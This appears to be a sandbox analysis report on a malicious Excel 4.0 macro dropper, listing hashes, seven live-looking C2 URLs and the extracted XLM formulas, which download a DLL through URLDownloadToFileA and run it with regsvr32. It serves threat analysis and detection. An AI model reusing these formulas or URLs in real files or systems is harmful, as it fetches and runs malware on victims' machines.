General

  • Target

    6e6c674d5cc7b727661f90019d29578733e3aa791a26747298f4fd1e8fce8cf9

  • Size

    29KB

  • Sample

    241121-az7l3s1pfn

  • MD5

    3e3a01295ed9448b02ba3f26ad3b142c

  • SHA1

    4e592a05b7d687745e245b9d3c8153c7bf80f3ca

  • SHA256

    6e6c674d5cc7b727661f90019d29578733e3aa791a26747298f4fd1e8fce8cf9

  • SHA512

    4c612b17db67103ad34a5cae43375dd1c39ffe253d24eb86d904b1f47a21ac030b07562a8296dc3638329a982198cc98d5a66f66ac7dd1d3a9c121b64539d5ae

  • SSDEEP

    384:RvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:ZqUtVNZAXby9y+cccS1AsuIjxl

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://iqraacfindia.org/wp-admin/dG/

https://he.adar-and-ido.com/wp-admin/xk7D/

https://www.digigoal.fr/wp-admin/VfU0aIj/

https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/

https://al-brik.com/vb/mMQlbHPCX/

https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/

https://biantarajaya.com/awstats-icon/VR5wDEvBj/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://iqraacfindia.org/wp-admin/dG/","..\whxc.dll",0,0)
    =IF('IJEGVS'!H16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://he.adar-and-ido.com/wp-admin/xk7D/","..\whxc.dll",0,0))
    =IF('IJEGVS'!H18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.digigoal.fr/wp-admin/VfU0aIj/","..\whxc.dll",0,0))
    =IF('IJEGVS'!H20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/","..\whxc.dll",0,0))
    =IF('IJEGVS'!H22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb/mMQlbHPCX/","..\whxc.dll",0,0))
    =IF('IJEGVS'!H24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/","..\whxc.dll",0,0))
    =IF('IJEGVS'!H26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://biantarajaya.com/awstats-icon/VR5wDEvBj/","..\whxc.dll",0,0))
    =IF('IJEGVS'!H28<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\whxc.dll")
    =RETURN()

Extracted

Language: xlm4.0
Source: xlm40.dropper
URLs:

    https://iqraacfindia.org/wp-admin/dG/
    https://he.adar-and-ido.com/wp-admin/xk7D/
    https://www.digigoal.fr/wp-admin/VfU0aIj/
    https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/
    https://al-brik.com/vb/mMQlbHPCX/
    https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/
    https://biantarajaya.com/awstats-icon/VR5wDEvBj/

Targets

    • Target

      6e6c674d5cc7b727661f90019d29578733e3aa791a26747298f4fd1e8fce8cf9

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
